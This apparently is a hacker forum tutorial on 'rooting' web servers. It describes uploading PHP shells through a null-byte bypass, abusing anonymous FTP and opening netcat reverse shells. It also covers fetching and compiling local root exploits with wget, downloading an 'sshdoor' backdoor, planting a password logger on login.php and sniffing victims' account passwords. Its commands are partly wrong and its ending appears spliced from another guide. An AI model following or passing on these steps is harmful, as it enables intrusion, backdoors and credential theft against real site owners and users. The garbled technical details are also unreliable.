Rooting isn’t just simply finding a local root exploit,
Rooting is gaining a high uid on a server which gains statics to control the
entire server. Most people think they are actually completing their step in
rooting when they are not, all people do is mixed in this order:
1. Back Connect OR use the prompt in the shell itself and type in uname -a
2. Get the version for the box, it may be familiar to 2.6.18
3. Go on securityfocus or 1337day.com and search for it.
4. Get a connection via back-connect, then they simply wget a Local Root
Exploit. Or simply go to the PHP shell itself and go to a dir and upload a .C
file which pertains a Local Root Exploit.
5- Get the ID it was labeled, it will be featured in the wget results, or if
you did it via shell, you will know the name it was given because you uploaded
it.
6. Then simply gcc -o ExploitName or gcc -o LocalRootExploitName.c
But today I will be showing you how to do this and actually understand what you
are doing. You will use 1337day and while your doing this you will upgrade your
knowledge.
First, get your PHP shell, you can upload it through FTP using mput (mput is a
command used to add something on a server included from your system, example:
mput C:usersX-pOSedshell.php)
Or you can do it if you find an upload.php dir on the system, of course
upload.php can feature uploading php, or it can feature an only accessory for
.jpg/.png/etc. Well, this can easily be bypassed through a Null Byte Upload, to
do this, all you need to do is compile your php script into a .jpg function.
You can do this by following these steps:
1. Open Notepad
2. Add your php script
3. File >> Save as >> shellname.php.jpg (you have to leave it is a
URL-Encoded Byte)
4. Upload on the server.
Null Byte is used to terminate anything after it.
But this can be patched on some web servers, so DO NOT expect it to work 100%.
But if /upload.php features an accessible function for the extension .php
Then upload your normal PHP Shell. And then you need to find the directory, you
can usually get this by doing the following:
1. Your victimized site has to have Anonymous User enabled.
2. Open Command Prompt
3. Type in ftp http://www.victim.com
4. Enter wrong details when it asks for user and password
5. After that is finished type in: quote user ftp (It quotes the user under the
name FTP) then type in: quote cwd ~root (Pertains the cwd of root) then type
in: quote pass ftp
Now you have the ability to view dirs, cd to directories, etc.
Try finding incoming, and if you do, try finding your shell.
If you cannot find anything, there are other things you can do.
You can use acunetix web scanner to find directories.
After you got your shell up and ready, play around a bit, and try finding mysql
details (in config.php, irc details in ircd.conf, etc, etc) If you find it
there is probably an mysql option in your shell, use it. You can also try
logging in with those details in SSH, which can get you root easily. To try
this out, you cannot just telnet to port 22, because port 22 (ssh) has its own
client/server.
Download PuTTy here:
http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
Insert the site you want to connect to, and be sure the label is selected on
SSH.
Once you do that, press Open.
Now try the details you got in config.php
If it doesn’t work, your out of luck on that probability.
But, we do not stop there.
Go to “Back Connection” your IP is in the text box and in the sec text box is
your port, the port you want to back-connect to needs to be forwarded. This can
be easily done if you locate your HTTP config for your router. You can find
this in command prompt by typing in ipconfig and in linux all you need to do is
type in ifconfig.
Now go to the main router page (192.168.0.1 as an example), then search around
for Port Forwarding. Your router page may require a password, if its changed,
just simply restart your router, and if it still does not work, search on
google.
After your port is forwarded (Port forward example: 1337) insert it into the
second text box. But wait up, your not done. You will need to install netcat,
in linux simply:
sudo apt-get install netcat
And in Windows, go to this link:
http://joncraton.org/files/nc111nt.zip
You might need to uninstall winrar, well, put nc111nt.zip in a directory, on
your desktop, documents, anywhere. I recommend putting it on the desktop
time-being.
Then open Command Prompt, then type in cd C:usersNAMEdesktopnc111nt or cd
C:usersNAMEdesktopnc111nt.zip
Now when your in there, type:
nc
If anything comes back, its working.
Now type in:
nc -l -n -v -p PORT
PORT needs to be replaced with the port you forwarded.
Press enter, then go to your shell and press the magic button ( On the
back-connection page where you inserted your IP along with the forwarded port).
Now you should be in your back-connect session. Type in:
uname -a
This will show us its current Linux Version, SMTP Version, PHP version, etc,
for example:
Linux linux1.dmehosting.com 2.6.17-92.1.10.el5PAE #1 SMP Mon Jar 30 08:14:05
EDT 2011 i686
Now you go to 1337day.com, as you can see .
There are various more all you need to do is go 1337day and search for 2.6.17
That there is a C script that can be used for gaining root on the server.
Well, we can do this two ways, lets discuss the first:
1. Open Notepad
2. Put in the C script
3. File >> Save as >> LocalRootExploit.C
4. Upload it on the shell
5. Open your netcat session
6. Type in gcc root -o LocalRootExploit.c (gcc is a command in ssh used for
compiling a certain directory, this tells it to make a root dir, and open it as
what we earlier uploaded via our shell, which in this case is
LocalRootExploit.c)
7. Type in ./root
8. It should clearly compile and give you root. To be sure simply type in:
whoami and/or id if whoami comes back with root, you’ve completed your mission,
and if in ID, it comes with something like: uid=(0)root you’ve completed your
mission as well.
Or we can do this via netcat:
1. Go to your netcat session
2. Type in wget http://milw0rm.com/exploits/5092 (wget is used to download a
file from a particular server, in this case: milw0rm)
4. Now considering 5092 was the last bit in our URL, that is what we will need
to compile it as
5. Type in gcc root -o 5092 (gcc is a command in ssh used for compiling a
certain directory, this tells it to make a root dir, and open it as what we
earlier wget’d, which in this case is 5092)
7. Type in ./root
8. It should clearly compile and give you root. To be sure simply type in:
whoami and/or id if whoami comes back with root, you’ve completed your mission,
and if in ID, it comes with something like: uid=(0)root you’ve completed your
mission as well.
Now you can add an sshdoor via:
wget http://www.familysksd.phpnet.us/sshdoor
You can use plenty of commands and even sudo apt-get install some accessories
you can also use the Edit command or Emacs command to add a password logger
(php based) on login.php.
6. Finally, go to start>start sniffing .Now when the victim logs into gmail or facebook or paypal etc., he will be using HTTP not HTTPS . Hence
it is now easier for us to get the User id ,passwords of the victim
what he is using to log into the desired accounts. Just check the
processing window out there and check log for the below combination.
